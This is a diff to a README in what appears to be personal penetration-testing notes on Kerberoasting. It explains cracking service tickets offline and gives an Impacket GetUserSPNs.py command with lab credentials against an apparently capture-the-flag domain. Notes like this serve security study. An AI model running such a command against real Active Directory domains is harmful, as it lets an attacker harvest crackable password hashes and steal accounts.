b-sct/LDAP/Kerberoasting/README.md

 # SPNs

-If a user account has an SPN, we can request a service ticket on behalf of it, and crack it offline.
+If a user account has an SPN, we can request a TGS on his behalf, which we can crack offline to get the password.

 ```
 python GetUserSPNs.py -k scrm.local/ksimpson:ksimpson -dc-ip 10.10.11.168 -target-domain scrm.local -dc-host dc1.scrm.local -outputfile kerberoastables.txt